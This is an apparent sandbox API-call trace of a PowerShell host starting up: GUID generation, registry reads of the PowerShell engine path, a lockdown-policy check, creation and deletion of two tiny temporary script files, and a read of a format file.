	[0043.413] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xafde2f0, Data2=0x2dd2, Data3=0x4abd, Data4=([0]=0xaa, [1]=0x7, [2]=0x56, [3]=0xe2, [4]=0xe0, [5]=0xc4, [6]=0x2a, [7]=0x17))) returned 0x0
	[0043.413] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x941e2fb3, Data2=0xeec6, Data3=0x4a5d, Data4=([0]=0xab, [1]=0x2, [2]=0xca, [3]=0x79, [4]=0xa0, [5]=0x81, [6]=0x83, [7]=0x95))) returned 0x0
	[0043.413] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xbf2d1a86, Data2=0xc2f8, Data3=0x4e57, Data4=([0]=0x8b, [1]=0x7, [2]=0x53, [3]=0xf4, [4]=0xc2, [5]=0x81, [6]=0x93, [7]=0x54))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x557206ac, Data2=0x2b75, Data3=0x41bd, Data4=([0]=0xa3, [1]=0xd4, [2]=0x4f, [3]=0xfd, [4]=0xc4, [5]=0xdc, [6]=0xf8, [7]=0xdd))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xf3bba3f7, Data2=0xf779, Data3=0x4370, Data4=([0]=0x95, [1]=0x87, [2]=0x59, [3]=0x55, [4]=0xa4, [5]=0x4a, [6]=0xc5, [7]=0x75))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xa04aec4d, Data2=0xb1fb, Data3=0x410d, Data4=([0]=0xbd, [1]=0x4c, [2]=0xc5, [3]=0xd4, [4]=0x6d, [5]=0x6b, [6]=0xd, [7]=0xcd))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x9d337581, Data2=0xe2aa, Data3=0x46f7, Data4=([0]=0xbb, [1]=0x1c, [2]=0xcb, [3]=0xa2, [4]=0xd1, [5]=0x49, [6]=0x3c, [7]=0x75))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x1499382b, Data2=0xae20, Data3=0x49fb, Data4=([0]=0xa0, [1]=0x7a, [2]=0x7b, [3]=0xaa, [4]=0x4c, [5]=0xb, [6]=0xdd, [7]=0x1e))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x49bcd313, Data2=0x9e1a, Data3=0x4909, Data4=([0]=0xa8, [1]=0x90, [2]=0x9f, [3]=0xd5, [4]=0xfe, [5]=0xd9, [6]=0x6e, [7]=0xf5))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x1583328, Data2=0x8a74, Data3=0x4fac, Data4=([0]=0xb5, [1]=0x3f, [2]=0xa4, [3]=0xff, [4]=0x92, [5]=0x78, [6]=0x7c, [7]=0xf4))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xbbaa2e2e, Data2=0xb1d6, Data3=0x4e45, Data4=([0]=0x99, [1]=0x74, [2]=0x74, [3]=0x68, [4]=0x77, [5]=0x41, [6]=0xad, [7]=0xef))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xa88cc0ae, Data2=0xedd0, Data3=0x4073, Data4=([0]=0xb0, [1]=0x6d, [2]=0x8d, [3]=0x8a, [4]=0x75, [5]=0xd8, [6]=0x54, [7]=0xab))) returned 0x0
	[0043.414] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x8bf5e45d, Data2=0x6bed, Data3=0x4333, Data4=([0]=0x9b, [1]=0xd8, [2]=0x63, [3]=0x97, [4]=0xab, [5]=0x1e, [6]=0x2d, [7]=0x5a))) returned 0x0
	[0043.416] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xa55b3a9b, Data2=0x27bc, Data3=0x41b6, Data4=([0]=0xb1, [1]=0x4f, [2]=0x6f, [3]=0xc9, [4]=0x1e, [5]=0xbb, [6]=0x43, [7]=0x16))) returned 0x0
	[0043.418] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x7ffe13d3, Data2=0x2587, Data3=0x4e60, Data4=([0]=0xa3, [1]=0x1d, [2]=0xa3, [3]=0x89, [4]=0x58, [5]=0xcd, [6]=0x1b, [7]=0xf7))) returned 0x0
	[0043.418] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xf6ec32cf, Data2=0x8d52, Data3=0x46ca, Data4=([0]=0x9c, [1]=0x98, [2]=0x6a, [3]=0x3b, [4]=0x79, [5]=0xae, [6]=0xd6, [7]=0xc2))) returned 0x0
	[0043.469] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x7c38baa5, Data2=0xe934, Data3=0x44d3, Data4=([0]=0x91, [1]=0xcb, [2]=0x26, [3]=0x67, [4]=0xde, [5]=0x53, [6]=0x4a, [7]=0x1e))) returned 0x0
	[0043.469] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xcd3e11bd, Data2=0x8eb5, Data3=0x4554, Data4=([0]=0x82, [1]=0x80, [2]=0xe5, [3]=0x5e, [4]=0x7d, [5]=0xd9, [6]=0x5d, [7]=0x76))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x1ccc0f23, Data2=0x1e1b, Data3=0x480b, Data4=([0]=0xa3, [1]=0x19, [2]=0x9c, [3]=0x1b, [4]=0x7c, [5]=0x6d, [6]=0xa7, [7]=0xb9))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x413f2b0e, Data2=0xcd4, Data3=0x4f27, Data4=([0]=0xa3, [1]=0x9c, [2]=0xbf, [3]=0xd4, [4]=0x76, [5]=0xfb, [6]=0x79, [7]=0x95))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x8e935f21, Data2=0xd753, Data3=0x418c, Data4=([0]=0xba, [1]=0x18, [2]=0xe5, [3]=0xb6, [4]=0xbe, [5]=0xb, [6]=0x53, [7]=0x2b))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x93f3b23f, Data2=0x5200, Data3=0x4e13, Data4=([0]=0xa6, [1]=0x82, [2]=0x99, [3]=0xab, [4]=0x49, [5]=0xfc, [6]=0x8a, [7]=0xb5))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xe8ce8d5b, Data2=0xe49d, Data3=0x4014, Data4=([0]=0xa9, [1]=0x18, [2]=0xf7, [3]=0x54, [4]=0xfb, [5]=0x16, [6]=0x1e, [7]=0xb))) returned 0x0
	[0043.470] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x14c55486, Data2=0x5ad5, Data3=0x4e59, Data4=([0]=0x9e, [1]=0x10, [2]=0x2b, [3]=0xb2, [4]=0x93, [5]=0x7b, [6]=0x13, [7]=0xea))) returned 0x0
	[0043.471] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x12b4c8ec, Data2=0xf2f7, Data3=0x4496, Data4=([0]=0x98, [1]=0xa9, [2]=0xc6, [3]=0xe9, [4]=0xd6, [5]=0xe7, [6]=0xe6, [7]=0x1c))) returned 0x0
	[0043.560] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x98eafc32, Data2=0x4dbc, Data3=0x48a0, Data4=([0]=0x96, [1]=0x79, [2]=0xd3, [3]=0x3f, [4]=0x71, [5]=0xd8, [6]=0x77, [7]=0x93))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xd49de136, Data2=0xa64a, Data3=0x4f66, Data4=([0]=0xa8, [1]=0xe9, [2]=0x5f, [3]=0x86, [4]=0xd, [5]=0xa4, [6]=0xc2, [7]=0x3))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xf6086896, Data2=0xca8c, Data3=0x4799, Data4=([0]=0xa7, [1]=0x8d, [2]=0xee, [3]=0xd, [4]=0x24, [5]=0xde, [6]=0x4e, [7]=0x17))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x4227f8c7, Data2=0x1e4c, Data3=0x4085, Data4=([0]=0xbb, [1]=0xf, [2]=0x75, [3]=0x7, [4]=0x22, [5]=0xa1, [6]=0x31, [7]=0x1f))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xd231bab5, Data2=0xe47d, Data3=0x4e2f, Data4=([0]=0x94, [1]=0xcb, [2]=0xcf, [3]=0x37, [4]=0xfb, [5]=0x3e, [6]=0xe7, [7]=0x31))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x5f2930aa, Data2=0xc54f, Data3=0x4a5b, Data4=([0]=0x80, [1]=0x18, [2]=0xab, [3]=0xfc, [4]=0x40, [5]=0xdc, [6]=0x45, [7]=0x81))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x5a529c7e, Data2=0x40a0, Data3=0x486e, Data4=([0]=0x90, [1]=0xdb, [2]=0x5e, [3]=0xd0, [4]=0x72, [5]=0x30, [6]=0x7b, [7]=0x4e))) returned 0x0
	[0043.562] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x92beacaf, Data2=0x6473, Data3=0x4e8a, Data4=([0]=0x9c, [1]=0xaa, [2]=0x60, [3]=0x25, [4]=0xa1, [5]=0x15, [6]=0x41, [7]=0x2b))) returned 0x0
	[0043.563] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x604e7bff, Data2=0x88a6, Data3=0x439a, Data4=([0]=0xaf, [1]=0x3b, [2]=0xb4, [3]=0x95, [4]=0x67, [5]=0x91, [6]=0xc7, [7]=0xa5))) returned 0x0
	[0043.563] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x6fbef6e4, Data2=0xb5ca, Data3=0x4123, Data4=([0]=0x98, [1]=0xfb, [2]=0x19, [3]=0xa7, [4]=0xaf, [5]=0x33, [6]=0x90, [7]=0xc))) returned 0x0
	[0043.563] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xbb7f3e1c, Data2=0x30e7, Data3=0x43ee, Data4=([0]=0xbc, [1]=0x8c, [2]=0xa8, [3]=0x74, [4]=0xeb, [5]=0xa0, [6]=0x69, [7]=0xd1))) returned 0x0
	[0043.569] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0xa2e5c5ae, Data2=0x1833, Data3=0x4ea8, Data4=([0]=0xa2, [1]=0xc7, [2]=0x5e, [3]=0x56, [4]=0x22, [5]=0x23, [6]=0x7c, [7]=0x63))) returned 0x0
	[0043.619] CoCreateGuid (in: pguid=0x184b47aa38 | out: pguid=0x184b47aa38*(Data1=0x5e727779, Data2=0x7323, Data3=0x42a9, Data4=([0]=0xb4, [1]=0xcf, [2]=0xf, [3]=0x2a, [4]=0x50, [5]=0xf9, [6]=0xd4, [7]=0xc4))) returned 0x0
	[0043.620] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47d218 | out: phkResult=0x184b47d218*=0x3b4) returned 0x0
	[0043.620] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d268, lpData=0x0, lpcbData=0x184b47d260*=0x0 | out: lpType=0x184b47d268*=0x1, lpData=0x0, lpcbData=0x184b47d260*=0x56) returned 0x0
	[0043.620] RegQueryValueExW (in: hKey=0x3b4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184b47d268, lpData=0x1504730c738, lpcbData=0x184b47d260*=0x56 | out: lpType=0x184b47d268*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184b47d260*=0x56) returned 0x0
	[0043.620] RegCloseKey (hKey=0x3b4) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0x73435972, Data2=0x1a23, Data3=0x4224, Data4=([0]=0xa7, [1]=0x3, [2]=0x61, [3]=0x8e, [4]=0xcc, [5]=0x51, [6]=0x76, [7]=0xa2))) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0x25ad24f2, Data2=0x5cc4, Data3=0x4a90, Data4=([0]=0x98, [1]=0x36, [2]=0xfd, [3]=0xa2, [4]=0x7f, [5]=0x91, [6]=0x1b, [7]=0x22))) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0xffffa9c2, Data2=0x3ce7, Data3=0x4a45, Data4=([0]=0xaf, [1]=0xef, [2]=0x36, [3]=0x3d, [4]=0x11, [5]=0x91, [6]=0x48, [7]=0x36))) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0x12377d3b, Data2=0x1d0c, Data3=0x48bc, Data4=([0]=0xb9, [1]=0xd0, [2]=0x26, [3]=0xe7, [4]=0xbd, [5]=0x6d, [6]=0x94, [7]=0x37))) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0x4e1eb94c, Data2=0x9246, Data3=0x4553, Data4=([0]=0x8c, [1]=0xf0, [2]=0x1, [3]=0xfc, [4]=0x9d, [5]=0xff, [6]=0x67, [7]=0x47))) returned 0x0
	[0043.622] CoCreateGuid (in: pguid=0x184b47d1a8 | out: pguid=0x184b47d1a8*(Data1=0x9983eb2e, Data2=0x3948, Data3=0x474e, Data4=([0]=0xbf, [1]=0x1f, [2]=0xb2, [3]=0x56, [4]=0x6b, [5]=0x19, [6]=0x56, [7]=0xb7))) returned 0x0
	[0043.664] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6ff0
	[0043.664] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1505f3b6ff0, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0043.664] CoTaskMemFree (pv=0x1505f3b6ff0) 
	[0043.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.665] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6770
	[0043.666] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6770, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0043.666] CoTaskMemFree (pv=0x1505f3b6770) 
	[0043.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0043.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0043.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0043.666] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0043.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0043.683] WldpGetLockdownPolicy () returned 0x10000000
	[0043.684] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6770
	[0043.684] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1505f3b6770 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\") returned 0x25
	[0043.684] CoTaskMemFree (pv=0x1505f3b6770) 
	[0043.684] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25
	[0043.684] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25
	[0043.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cec0) returned 1
	[0043.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfa0 | out: lpFileInformation=0x184b47cfa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f637c29, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x3ebffa0e, ftLastAccessTime.dwHighDateTime=0x1d492ec, ftLastWriteTime.dwLowDateTime=0x3ebffa0e, ftLastWriteTime.dwHighDateTime=0x1d492ec, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0043.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce80) returned 1
	[0043.690] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", nBufferLength=0x105, lpBuffer=0x184b47c830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", lpFilePart=0x0) returned 0x35
	[0043.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd10) returned 1
	[0043.690] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\bwaykzvy.uyx.ps1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4
	[0043.692] GetFileType (hFile=0x3d4) returned 0x1
	[0043.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc80) returned 1
	[0043.692] GetFileType (hFile=0x3d4) returned 0x1
	[0043.693] WriteFile (in: hFile=0x3d4, lpBuffer=0x15047320438*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x184b47cd58, lpOverlapped=0x0 | out: lpBuffer=0x15047320438*, lpNumberOfBytesWritten=0x184b47cd58*=0x1, lpOverlapped=0x0) returned 1
	[0043.694] CloseHandle (hObject=0x3d4) returned 1
	[0043.695] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", nBufferLength=0x105, lpBuffer=0x184b47c830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", lpFilePart=0x0) returned 0x36
	[0043.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd10) returned 1
	[0043.696] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\iiqbe4ps.w2t.psm1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3d4
	[0043.696] GetFileType (hFile=0x3d4) returned 0x1
	[0043.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cc80) returned 1
	[0043.696] GetFileType (hFile=0x3d4) returned 0x1
	[0043.696] WriteFile (in: hFile=0x3d4, lpBuffer=0x15047322aa0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x184b47cd58, lpOverlapped=0x0 | out: lpBuffer=0x15047322aa0*, lpNumberOfBytesWritten=0x184b47cd58*=0x1, lpOverlapped=0x0) returned 1
	[0043.697] CloseHandle (hObject=0x3d4) returned 1
	[0043.698] CoTaskMemAlloc (cb=0x6c) returned 0x1505f3c02d0
	[0043.698] IdentifyCodeAuthzLevelW () returned 0x1
	[0043.716] CoTaskMemFree (pv=0x1505f3c02d0) 
	[0043.716] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0043.717] CloseCodeAuthzLevel () returned 0x1
	[0043.717] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", lpFilePart=0x0) returned 0x35
	[0043.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0043.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\bwaykzvy.uyx.ps1"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba03f08, ftCreationTime.dwHighDateTime=0x1d492ec, ftLastAccessTime.dwLowDateTime=0x4ba03f08, ftLastAccessTime.dwHighDateTime=0x1d492ec, ftLastWriteTime.dwLowDateTime=0x4ba0e441, ftLastWriteTime.dwHighDateTime=0x1d492ec, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1
	[0043.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0043.717] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1", lpFilePart=0x0) returned 0x35
	[0043.717] DeleteFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\bwaykzvy.uyx.ps1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\bwaykzvy.uyx.ps1")) returned 1
	[0043.718] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", lpFilePart=0x0) returned 0x36
	[0043.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0043.718] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\iiqbe4ps.w2t.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba0ef08, ftCreationTime.dwHighDateTime=0x1d492ec, ftLastAccessTime.dwLowDateTime=0x4ba0ef08, ftLastAccessTime.dwHighDateTime=0x1d492ec, ftLastWriteTime.dwLowDateTime=0x4ba12a14, ftLastWriteTime.dwHighDateTime=0x1d492ec, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1
	[0043.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0043.718] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1", lpFilePart=0x0) returned 0x36
	[0043.718] DeleteFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\iiqbe4ps.w2t.psm1" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\iiqbe4ps.w2t.psm1")) returned 1
	[0043.720] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0043.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0043.720] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0043.720] RegCloseKey (hKey=0x3d8) returned 0x0
	[0043.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0043.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0043.721] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0043.721] GetFileType (hFile=0x3d8) returned 0x1
	[0043.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0043.721] GetFileType (hFile=0x3d8) returned 0x1
	[0043.725] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0043.725] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047325360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047325360*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0043.726] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
